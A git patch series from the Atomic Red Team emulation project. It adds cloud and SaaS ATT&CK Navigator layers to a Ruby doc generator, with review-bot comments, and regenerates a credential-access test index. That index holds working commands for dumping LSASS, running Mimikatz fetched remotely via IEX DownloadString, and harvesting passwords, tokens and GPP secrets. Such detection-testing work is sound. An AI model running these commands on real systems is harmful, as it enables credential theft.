           if atomic['supported_platforms'].any? {|platform| platform.downcase =~ /windows/} then has_windows_tests = true end
           if atomic['supported_platforms'].any? {|platform| platform.downcase =~ /macos/} then has_macos_tests = true end
           if atomic['supported_platforms'].any? {|platform| platform.downcase =~ /^(?!windows|macos).*$/} then has_linux_tests = true end
+          if atomic['supported_platforms'].any? {|platform| platform.downcase =~ /^iaas/} then has_iaas_tests = true end
+          if atomic['supported_platforms'].any? {|platform| platform.downcase =~ /^iaas:aws/} then has_iaas_aws_tests = true end
+          if atomic['supported_platforms'].any? {|platform| platform.downcase =~ /^iaas:azure/} then has_iaas_azure_tests = true end
+          if atomic['supported_platforms'].any? {|platform| platform.downcase =~ /^iaas:gcp/} then has_iaas_gcp_tests = true end
+          if atomic['supported_platforms'].any? {|platform| platform.downcase =~ /^containers/} then has_containers_tests = true end
+          if atomic['supported_platforms'].any? {|platform| platform.downcase =~ /^google-workspace/} then has_google_workspace_tests = true end
+          if atomic['supported_platforms'].any? {|platform| platform.downcase =~ /^azure-ad/} then has_azure_ad_tests = true end
+          if atomic['supported_platforms'].any? {|platform| platform.downcase =~ /^office-365/} then has_office_365_tests = true end
         end
         if has_windows_tests then
           techniques_win.push(technique)
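Review bot: `has_saas_tests` is initialised to false here but, unlike every other new flag, no `supported_platforms` check ever sets it, so it can never become true; the missing line is `if atomic['supported_platforms'].any? {|platform| platform.downcase =~ /^saas/} then has_saas_tests = true end`. The unchanged Linux test just above the new checks, `/^(?!windows|macos).*$/`, treats every platform name that is not windows or macos as Linux, so once tests carry `iaas:aws`, `containers`, `office-365` and the other values this hunk introduces, those cloud- and SaaS-only techniques will also be counted into the Linux layer. If `linux` is the only OS name left in the corpus, `=~ /^linux/` is the precise test; otherwise the negative lookahead needs the new prefixes added. The enclosing `ATOMIC_RED_TEAM.atomic_tests.each` block starts and ends outside this hunk.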
@@ -244,6 +282,34 @@ class AtomicRedTeamDocs techniques_lin.push(technique) techniques_lin.push(techniqueParent) unless techniques_lin.include?(techniqueParent) end + if has_iaas_tests then + techniques_iaas.push(technique) + techniques_iaas.push(techniqueParent) unless techniques_iaas.include?(techniqueParent) + end + if has_iaas_azure_tests then + techniques_iaas_azure.push(technique) + techniques_iaas_azure.push(techniqueParent) unless techniques_iaas_azure.include?(techniqueParent) + end + if has_iaas_gcp_tests then + techniques_iaas_gcp.push(technique) + techniques_iaas_gcp.push(techniqueParent) unless techniques_iaas_gcp.include?(techniqueParent) + end + if has_containers_tests then + techniques_containers.push(technique) + techniques_containers.push(techniqueParent) unless techniques_containers.include?(techniqueParent) + end + if has_google_workspace_tests then + techniques_google_workspace.push(technique) + techniques_google_workspace.push(techniqueParent) unless techniques_google_workspace.include?(techniqueParent) + end + if has_azure_ad_tests then + techniques_azure_ad.push(technique) + techniques_azure_ad.push(techniqueParent) unless techniques_azure_ad.include?(techniqueParent) + end + if has_office_365_tests then + techniques_office_365.push(technique) + techniques_office_365.push(techniqueParent) unless techniques_office_365.include?(techniqueParent) + end end end 
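Review bot: `has_iaas_aws_tests`, which the previous hunk computes, is never consumed here: there is no block pushing into `techniques_iaas_aws`, so the AWS layer this commit later writes to `art-navigator-layer-iaas-aws.json` will always carry an empty technique list. `has_saas_tests` and `techniques_saas` are likewise never wired together (and that flag is never set in the previous hunk either), so a SaaS layer could not be populated even if it were written. The two missing blocks follow the pattern of the seven added ones and belong alongside them; the enclosing `each` block begins outside this hunk.
```ruby
          # … unchanged: push blocks for iaas, iaas_azure, iaas_gcp, containers, google_workspace, azure_ad, office_365 …
          if has_iaas_aws_tests then
            techniques_iaas_aws.push(technique)
            techniques_iaas_aws.push(techniqueParent) unless techniques_iaas_aws.include?(techniqueParent)
          end
          if has_saas_tests then
            techniques_saas.push(technique)
            techniques_saas.push(techniqueParent) unless techniques_saas.include?(techniqueParent)
          end
```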
@@ -251,16 +317,41 @@ class AtomicRedTeamDocs layer_win = get_layer techniques_win, "Atomic Red Team (Windows)" layer_mac = get_layer techniques_mac, "Atomic Red Team (macOS)" layer_lin = get_layer techniques_lin, "Atomic Red Team (Linux)" + layer_iaas = get_layer techniques_iaas, "Atomic Red Team (Iaas)" + layer_iaas_aws = get_layer techniques_iaas_aws, "Atomic Red Team (Iaas:AWS)" + layer_iaas_azure = get_layer techniques_iaas_azure, "Atomic Red Team (Iaas:Azure)" + layer_iaas_gcp = get_layer techniques_iaas_gcp, "Atomic Red Team (Iaas:GCP)" + layer_containers = get_layer techniques_containers, "Atomic Red Team (Containers)" + layer_google_workspace = get_layer techniques_google_workspace, "Atomic Red Team (Google-Workspace)" + layer_azure_ad = get_layer techniques_azure_ad, "Atomic Red Team (Azure-AD)" + layer_office_365 = get_layer techniques_office_365, "Atomic Red Team (Office-365)" + File.write output_layer_path,layer.to_json File.write output_layer_path_win,layer_win.to_json File.write output_layer_path_mac,layer_mac.to_json File.write output_layer_path_lin,layer_lin.to_json + File.write output_layer_path_iaas,layer_iaas.to_json + File.write output_layer_path_iaas_aws,layer_iaas_aws.to_json + File.write output_layer_path_iaas_azure,layer_iaas_azure.to_json + File.write output_layer_path_iaas_gcp,layer_iaas_gcp.to_json + File.write output_layer_path_containers,layer_containers.to_json + File.write output_layer_path_google_workspace,layer_google_workspace.to_json + File.write output_layer_path_azure_ad,layer_azure_ad.to_json + File.write output_layer_path_office_365,layer_office_365.to_json puts "Generated Atomic Red Team ATT&CK Navigator Layers at #{output_layer_path}" puts "Generated Atomic Red Team ATT&CK Navigator Layers at #{output_layer_path_win}" puts "Generated Atomic Red Team ATT&CK Navigator Layers at #{output_layer_path_mac}" puts "Generated Atomic Red Team ATT&CK Navigator Layers at #{output_layer_path_lin}" + puts "Generated Atomic Red Team 
ATT&CK Navigator Layers at #{output_layer_path_iaas}" + puts "Generated Atomic Red Team ATT&CK Navigator Layers at #{output_layer_path_iaas_aws}" + puts "Generated Atomic Red Team ATT&CK Navigator Layers at #{output_layer_path_iaas_azure}" + puts "Generated Atomic Red Team ATT&CK Navigator Layers at #{output_layer_path_iaas_gcp}" + puts "Generated Atomic Red Team ATT&CK Navigator Layers at #{output_layer_path_containers}" + puts "Generated Atomic Red Team ATT&CK Navigator Layers at #{output_layer_path_google_workspace}" + puts "Generated Atomic Red Team ATT&CK Navigator Layers at #{output_layer_path_azure_ad}" + puts "Generated Atomic Red Team ATT&CK Navigator Layers at #{output_layer_path_office_365}" end end From 9a4ad97b0182fcac6ae77939bfbf5e0ad2589448 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Mon, 16 Aug 2021 13:54:34 +0000 Subject: [PATCH 18/39] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 3562 ++++++++++++++++++------------------ 1 file changed, 1781 insertions(+), 1781 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 17a1436d..a7d4214d 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -61,7 +61,7 @@ credential-access: cat #{output_file} cleanup_command: 'rm -f #{output_file} - ' +' name: bash elevation_required: true - name: Access /etc/passwd (Local) @@ -80,7 +80,7 @@ credential-access: cat #{output_file} cleanup_command: 'rm -f #{output_file} - ' +' name: sh T1557.002: technique: @@ -293,7 +293,7 @@ credential-access: description: 'Search through bash history for specifice commands we want to capture - ' +' supported_platforms: - linux - macos @@ -315,7 +315,7 @@ credential-access: command: 'cat #{bash_history_filename} | grep #{bash_history_grep_args} > #{output_file} - ' +' name: sh T1110: technique: 
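Review bot: `output_layer_path_saas` is accepted by the new signature but this hunk neither builds a SaaS layer nor writes one: there is no `layer_saas = get_layer techniques_saas, ...` and no `File.write output_layer_path_saas, ...`, so the `art-navigator-layer-saas.json` path the caller passes is never produced while the eight other new layers are. Adding `layer_saas = get_layer techniques_saas, "Atomic Red Team (SaaS)"`, `File.write output_layer_path_saas,layer_saas.to_json` and the matching `puts` line closes the gap, though the SaaS technique list also needs its flag and push block in the earlier hunks, which this commit omits. The new layer titles also spell the platform `Iaas` where the ATT&CK matrices use `IaaS`; worth aligning while the strings are fresh. The method begins outside this hunk.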
@@ -550,7 +550,7 @@ credential-access: pod service account, for example) can access sensitive information that might include credentials to various services. - ' +' supported_platforms: - containers input_arguments: @@ -561,17 +561,17 @@ credential-access: dependencies: - description: 'kubectl must be installed - ' +' get_prereq_command: 'echo "kubectl must be installed manually" - ' +' prereq_command: 'which kubectl - ' +' executor: command: 'kubectl get secrets -n #{namespace} - ' +' name: bash elevation_required: false - name: Cat the contents of a Kubernetes service account token file @@ -579,7 +579,7 @@ credential-access: description: 'Access the Kubernetes service account access token stored within a container in a cluster. - ' +' supported_platforms: - linux dependency_executor_name: sh @@ -587,24 +587,24 @@ credential-access: - description: Verify docker is installed. prereq_command: 'which docker - ' +' get_prereq_command: 'if [ "" == "`which docker`" ]; then echo "Docker Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else echo "Docker installed"; fi - ' +' - description: Verify docker service is running. prereq_command: 'sudo systemctl status docker - ' +' get_prereq_command: 'sudo systemctl start docker - ' +' - description: Verify kind is in the path. prereq_command: 'which kind - ' +' get_prereq_command: | curl -Lo ./kind https://kind.sigs.k8s.io/dl/v0.10.0/kind-linux-amd64 chmod +x ./kind @@ -612,14 +612,14 @@ credential-access: - description: Verify kind-atomic-cluster is created prereq_command: 'sudo kind get clusters - ' +' get_prereq_command: 'sudo kind create cluster --name atomic-cluster - ' +' - description: Verify kubectl is in path prereq_command: 'which kubectl - ' +' get_prereq_command: | curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl" chmod +x ./kubectl 
@@ -627,19 +627,19 @@ credential-access: - description: Verify atomic-pod is running. prereq_command: 'kubectl --context kind-atomic-cluster get pods |grep atomic-pod - ' +' get_prereq_command: 'kubectl --context kind-atomic-cluster run atomic-pod --image=alpine --command -- sleep infinity - ' +' executor: command: 'kubectl --context kind-atomic-cluster exec atomic-pod -- cat /run/secrets/kubernetes.io/serviceaccount/token - ' +' name: sh cleanup_command: 'kubectl --context kind-atomic-cluster delete pod atomic-pod - ' +' T1056.004: technique: external_references: @@ -741,7 +741,7 @@ credential-access: auto_generated_guid: de1934ea-1fbf-425b-8795-65fb27dd7e33 description: 'Hooks functions in PowerShell to read TLS Communications - ' +' supported_platforms: - windows input_arguments: @@ -757,10 +757,10 @@ credential-access: dependencies: - description: 'T1056.004x64.dll must exist on disk at specified location (#{file_name}) - ' +' prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1056.004/bin/T1056.004x64.dll" -OutFile "#{file_name}" @@ -846,7 +846,7 @@ credential-access: description: 'Using username,password combination from a password dump to login over SSH. - ' +' supported_platforms: - linux input_arguments: @@ -858,16 +858,16 @@ credential-access: dependencies: - description: 'Requires SSHPASS - ' +' prereq_command: 'if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then sudo apt update && sudo apt install sshpass -y; else echo "This test requires sshpass" ; fi ; - ' +' executor: name: bash elevation_required: false 
@@ -879,7 +879,7 @@ credential-access: description: 'Using username,password combination from a password dump to login over SSH. - ' +' supported_platforms: - macos input_arguments: @@ -891,11 +891,11 @@ credential-access: dependencies: - description: 'Requires SSHPASS - ' +' prereq_command: 'if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: | /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install.sh)" brew install hudochenkov/sshpass/sshpass @@ -991,14 +991,14 @@ credential-access: executor: command: 'python2 laZagne.py all - ' +' elevation_required: true name: bash - name: Extract passwords with grep auto_generated_guid: bd4cf0d1-7646-474e-8610-78ccf5a097c4 description: 'Extracting credentials from files - ' +' supported_platforms: - macos - linux @@ -1010,14 +1010,14 @@ credential-access: executor: command: 'grep -ri password #{file_path} - ' +' name: sh - name: Extracting passwords with findstr auto_generated_guid: 0e56bf29-ff49-4ea5-9af4-3b81283fd513 description: 'Extracting Credentials from Files. Upon execution, the contents of files that contain the word "password" will be displayed. - ' +' supported_platforms: - windows executor: @@ -1043,7 +1043,7 @@ credential-access: description: 'This test looks for .netrc files (which stores github credentials in clear text )and dumps its contents if found. - ' +' supported_platforms: - macos - linux @@ -1107,7 +1107,7 @@ credential-access: dependencies: - description: 'Microsoft Word must be installed - ' +' prereq_command: | try { New-Object -COMObject "word.Application" | Out-Null @@ -1118,7 +1118,7 @@ credential-access: get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually to meet this requirement" - ' +' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 
@@ -1127,7 +1127,7 @@ credential-access: cleanup_command: 'Remove-Item "$env:TEMP\windows-credentials.txt" -ErrorAction Ignore - ' +' name: powershell - name: Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] @@ -1154,7 +1154,7 @@ credential-access: command: 'IEX (IWR ''https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1'' -UseBasicParsing); Get-CredManCreds -Force - ' +' T1555.003: technique: created: '2020-02-12T18:57:36.041Z' @@ -1266,11 +1266,11 @@ credential-access: dependencies: - description: 'Modified Sysinternals must be located at #{file_path} - ' +' prereq_command: 'if (Test-Path #{file_path}\SysInternals) {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://github.com/mitre-attack/attack-arsenal/raw/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/Modified-SysInternalsSuite.zip" -OutFile "#{file_path}\Modified-SysInternalsSuite.zip" @@ -1318,10 +1318,10 @@ credential-access: dependencies: - description: 'LaZagne.exe must exist on disk at specified location (#{lazagne_path}) - ' +' prereq_command: 'if (Test-Path #{lazagne_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{lazagne_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/AlessandroZ/LaZagne/releases/download/2.4.3/lazagne.exe" -OutFile "#{lazagne_path}" @@ -1386,7 +1386,7 @@ credential-access: description: 'Queries to enumerate for credentials in the Registry. Upon execution, any registry key containing the word "password" will be displayed. - ' +' supported_platforms: - windows executor: @@ -1404,7 +1404,7 @@ credential-access: executor: command: 'reg query HKCU\Software\SimonTatham\PuTTY\Sessions /t REG_SZ /s - ' +' name: command_prompt T1003.006: technique: 
@@ -1521,7 +1521,7 @@ credential-access: - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) - ' +' prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1} @@ -1878,7 +1878,7 @@ credential-access: to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"'' - ' +' name: bash - name: PowerShell - Prompt User for Password auto_generated_guid: 2b162bfd-0928-4d4c-9ec3-4d9f88374b52 @@ -2008,7 +2008,7 @@ credential-access: - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) - ' +' prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1} @@ -2113,26 +2113,26 @@ credential-access: files on the Domain Controller. This value can be decrypted with gpp-decrypt on Kali Linux. - ' +' supported_platforms: - windows dependency_executor_name: powershell dependencies: - description: 'Computer must be domain joined - ' +' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually - ' +' executor: command: 'findstr /S cpassword %logonserver%\sysvol\*.xml - ' +' name: command_prompt - name: GPP Passwords (Get-GPPPassword) auto_generated_guid: e9584f82-322c-474a-b831-940fd8b4455c 
@@ -2157,25 +2157,25 @@ credential-access: dependencies: - description: 'Get-GPPPassword PowerShell Script must exist at #{gpp_script_path} - ' +' prereq_command: 'if(Test-Path "#{gpp_script_path}") {exit 0 } else {exit 1 } - ' +' get_prereq_command: | New-Item -ItemType Directory (Split-Path "#{gpp_script_path}") -Force | Out-Null Invoke-WebRequest #{gpp_script_url} -OutFile "#{gpp_script_path}" - description: 'Computer must be domain joined - ' +' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually - ' +' executor: command: | . #{gpp_script_path} @@ -2348,15 +2348,15 @@ credential-access: dependencies: - description: 'Computer must be domain joined - ' +' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually - ' +' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -2526,7 +2526,7 @@ credential-access: .\T1056.001\src\Get-Keystrokes.ps1 -LogPath #{filepath} cleanup_command: 'Remove-Item $env:TEMP\key.log -ErrorAction Ignore - ' +' name: powershell elevation_required: true - name: Living off the land Terminal Input Capture on Linux with pam.d @@ -2545,14 +2545,14 @@ credential-access: dependencies: - description: 'Checking if pam_tty_audit.so is installed - ' +' prereq_command: 'test -f ''/usr/lib/pam/pam_tty_audit.so -o /usr/lib64/security/pam_tty_audit.so'' - ' +' get_prereq_command: 'echo "Sorry, you must install module pam_tty_audit.so and recompile, for this test to work" - ' +' supported_platforms: - linux executor: 
@@ -2871,10 +2871,10 @@ credential-access: - description: 'Windows Credential Editor must exist on disk at specified location (#{wce_exe}) - ' +' prereq_command: 'if (Test-Path #{wce_exe}) {exit 0} else {exit 1} - ' +' get_prereq_command: | $parentpath = Split-Path "#{wce_exe}"; $zippath = "$parentpath\wce.zip" [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -2914,10 +2914,10 @@ credential-access: - description: 'ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe}) - ' +' prereq_command: 'if (Test-Path #{procdump_exe}) {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip" @@ -2928,7 +2928,7 @@ credential-access: command: "#{procdump_exe} -accepteula -ma lsass.exe #{output_file}\n" cleanup_command: 'del "#{output_file}" >nul 2> nul - ' +' name: command_prompt elevation_required: true - name: Dump LSASS.exe Memory using comsvcs.dll @@ -2943,10 +2943,10 @@ credential-access: command: 'C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full - ' +' cleanup_command: 'Remove-Item $env:TEMP\lsass-comsvcs.dmp -ErrorAction Ignore - ' +' name: powershell elevation_required: true - name: Dump LSASS.exe Memory using direct system calls and API unhooking @@ -2969,10 +2969,10 @@ credential-access: - description: 'Dumpert executable must exist on disk at specified location (#{dumpert_exe}) - ' +' prereq_command: 'if (Test-Path #{dumpert_exe}) {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -ItemType Directory (Split-Path #{dumpert_exe}) -Force | Out-Null 
@@ -2981,7 +2981,7 @@ credential-access: command: "#{dumpert_exe}\n" cleanup_command: 'del C:\windows\temp\dumpert.dmp >nul 2> nul - ' +' name: command_prompt elevation_required: true - name: Dump LSASS.exe Memory using Windows Task Manager @@ -3024,10 +3024,10 @@ credential-access: dependencies: - description: 'Mimikatz must exist on disk at specified location (#{mimikatz_exe}) - ' +' prereq_command: 'if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 $url = 'https://github.com/gentilkiwi/mimikatz/releases/latest' @@ -3044,19 +3044,19 @@ credential-access: Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force - description: 'Lsass dump must exist at specified location (#{input_file}) - ' +' prereq_command: 'cmd /c "if not exist #{input_file} (exit /b 1)" - ' +' get_prereq_command: 'Write-Host "Create the lsass dump manually using the steps in the previous test (Dump LSASS.exe Memory using Windows Task Manager)" - ' +' executor: command: '#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit - ' +' name: command_prompt elevation_required: true - name: LSASS read with pypykatz 
@@ -3073,35 +3073,35 @@ credential-access: dependencies: - description: 'Computer must have python 3 installed - ' +' prereq_command: | py -3 --version >nul 2>&1 exit /b %errorlevel% get_prereq_command: 'echo "Python 3 must be installed manually" - ' +' - description: 'Computer must have pip installed - ' +' prereq_command: | py -3 -m pip --version >nul 2>&1 exit /b %errorlevel% get_prereq_command: 'echo "PIP must be installed manually" - ' +' - description: 'pypykatz must be installed and part of PATH - ' +' prereq_command: | pypykatz -h >nul 2>&1 exit /b %errorlevel% get_prereq_command: 'pip install pypykatz - ' +' executor: command: 'pypykatz live lsa - ' +' name: command_prompt elevation_required: true - name: Dump LSASS.exe Memory using Out-Minidump.ps1 @@ -3118,7 +3118,7 @@ credential-access: IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump cleanup_command: 'Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore - ' +' name: powershell elevation_required: true - name: Create Mini Dump of LSASS.exe using ProcDump @@ -3146,10 +3146,10 @@ credential-access: - description: 'ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe}) - ' +' prereq_command: 'if (Test-Path #{procdump_exe}) {exit 0} else {exit 1} - ' +' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip" Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force @@ -3159,7 +3159,7 @@ credential-access: command: "#{procdump_exe} -accepteula -mm lsass.exe #{output_file}\n" cleanup_command: 'del "#{output_file}" >nul 2> nul - ' +' name: command_prompt elevation_required: true - name: Powershell Mimikatz 
@@ -3181,7 +3181,7 @@ credential-access: command: 'IEX (New-Object Net.WebClient).DownloadString(''#{remote_script}''); Invoke-Mimikatz -DumpCreds - ' +' name: powershell elevation_required: true - name: Dump LSASS with .Net 5 createdump.exe @@ -3203,15 +3203,15 @@ credential-access: dependencies: - description: 'Computer must have createdump.exe from .Net 5 - ' +' prereq_command: 'if (Test-Path ''#{createdump_exe}'') {exit 0} else {exit 1} - ' +' get_prereq_command: 'echo ".NET 5 must be installed manually." "For the very brave a copy of the executable can be found here: https://github.com/Scoubi/RedTeam-Tools/blob/main/createdump.exe" - ' +' executor: command: | echo "Createdump Path #{createdump_exe}" @@ -3221,7 +3221,7 @@ credential-access: & "#{createdump_exe}" -u -f #{output_file} $ID cleanup_command: 'del #{output_file} - ' +' name: powershell elevation_required: true - name: Dump LSASS.exe using imported Microsoft DLLs @@ -3246,10 +3246,10 @@ credential-access: dependencies: - description: 'Computer must have xordump.exe - ' +' prereq_command: 'if (Test-Path ''#{xordump_exe}'') {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe} @@ -3257,7 +3257,7 @@ credential-access: command: "#{xordump_exe} -out #{output_file} -x 0x41\n" cleanup_command: 'Remove-Item ${output_file} -ErrorAction Ignore - ' +' name: powershell elevation_required: true T1557: 
@@ -3463,19 +3463,19 @@ credential-access: dependencies: - description: 'Target must be a Domain Controller - ' +' prereq_command: 'reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT - ' +' get_prereq_command: 'echo Sorry, Promoting this machine to a Domain Controller must be done manually - ' +' executor: command: 'vssadmin.exe create shadow /for=#{drive_letter} - ' +' name: command_prompt elevation_required: true - name: Copy NTDS.dit from Volume Shadow Copy @@ -3502,34 +3502,34 @@ credential-access: dependencies: - description: 'Target must be a Domain Controller - ' +' prereq_command: 'reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT - ' +' get_prereq_command: 'echo Sorry, Promoting this machine to a Domain Controller must be done manually - ' +' - description: 'Volume shadow copy must exist - ' +' prereq_command: 'if not exist #{vsc_name} (exit /b 1) - ' +' get_prereq_command: 'echo Run "Invoke-AtomicTest T1003.003 -TestName ''Create Volume Shadow Copy with vassadmin''" to fulfuill this requirement - ' +' - description: 'Extract path must exist - ' +' prereq_command: 'if not exist #{extract_path} (exit /b 1) - ' +' get_prereq_command: 'mkdir #{extract_path} - ' +' executor: command: | copy #{vsc_name}\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit 
@@ -3561,22 +3561,22 @@ credential-access: dependencies: - description: 'Target must be a Domain Controller - ' +' prereq_command: 'reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT - ' +' get_prereq_command: 'echo Sorry, Promoting this machine to a Domain Controller must be done manually - ' +' executor: command: | mkdir #{output_folder} ntdsutil "ac i ntds" "ifm" "create full #{output_folder}" q q cleanup_command: 'rmdir /q /s #{output_folder} >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: Create Volume Shadow Copy with WMI @@ -3595,19 +3595,19 @@ credential-access: dependencies: - description: 'Target must be a Domain Controller - ' +' prereq_command: 'reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT - ' +' get_prereq_command: 'echo Sorry, Promoting this machine to a Domain Controller must be done manually - ' +' executor: command: 'wmic shadowcopy call create Volume=#{drive_letter} - ' +' name: command_prompt elevation_required: true - name: Create Volume Shadow Copy with Powershell @@ -3771,15 +3771,15 @@ credential-access: dependencies: - description: 'Check if at least one of the tools are installed on the machine. - ' +' prereq_command: 'if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi; - ' +' get_prereq_command: 'echo "Install tcpdump and/or tshark for the test to run."; exit 1; - ' +' executor: command: | tcpdump -c 5 -nnni #{interface} 
@@ -3803,15 +3803,15 @@ credential-access: dependencies: - description: 'Check if at least one of the tools are installed on the machine. - ' +' prereq_command: 'if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi; - ' +' get_prereq_command: 'echo "Install tcpdump and/or tshark for the test to run."; exit 1; - ' +' executor: command: "sudo tcpdump -c 5 -nnni #{interface} \nif [ -x \"$(command -v tshark)\" ]; then sudo tshark -c 5 -i #{interface}; fi;\n" @@ -3852,14 +3852,14 @@ credential-access: - description: 'tshark must be installed and in the default path of "c:\Program Files\Wireshark\Tshark.exe". - ' +' prereq_command: if (test-path "#{tshark_path}") {exit 0} else {exit 1} get_prereq_command: | Invoke-WebRequest -OutFile $env:temp\wireshark_installer.exe #{wireshark_url} Start-Process $env:temp\wireshark_installer.exe /S - description: 'npcap must be installed. - ' +' prereq_command: if (test-path "#{npcap_path}") {exit 0} else {exit 1} get_prereq_command: | Invoke-WebRequest -OutFile $env:temp\npcap_installer.exe #{npcap_url} @@ -3867,7 +3867,7 @@ credential-access: executor: command: '"c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5 - ' +' name: command_prompt elevation_required: true - name: Windows Internal Packet Capture @@ -4034,10 +4034,10 @@ credential-access: dependencies: - description: 'Gsecdump must exist on disk at specified location (#{gsecdump_exe}) - ' +' prereq_command: 'if (Test-Path #{gsecdump_exe}) {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 $parentpath = Split-Path "#{gsecdump_exe}"; $binpath = "$parentpath\gsecdump-v2b5.exe" 
@@ -4102,7 +4102,7 @@ credential-access: C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump $id $env:TEMP\svchost-exe.dmp full cleanup_command: 'Remove-Item $env:TEMP\svchost-exe.dmp -ErrorAction Ignore - ' +' name: powershell elevation_required: true T1110.002: @@ -4270,7 +4270,7 @@ credential-access: description: 'Uses PowerShell to install and register a password filter DLL. Requires a reboot and administrative privileges. - ' +' supported_platforms: - windows input_arguments: @@ -4283,14 +4283,14 @@ credential-access: - description: 'AtomicPasswordFilter.dll must exist on disk at specified location (#{input_dll}) - ' +' prereq_command: 'if (Test-Path #{input_dll}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host "You must provide your own password filter dll" - ' +' executor: command: | $passwordFilterName = (Copy-Item "#{input_dll}" -Destination "C:\Windows\System32" -PassThru).basename @@ -4382,7 +4382,7 @@ credential-access: description: 'Creates username and password files then attempts to brute force Active Directory accounts on remote host - ' +' supported_platforms: - windows input_arguments: @@ -4422,7 +4422,7 @@ credential-access: description: 'Attempt to brute force Active Directory domain user on a domain controller, via LDAP, with NTLM or Kerberos - ' +' 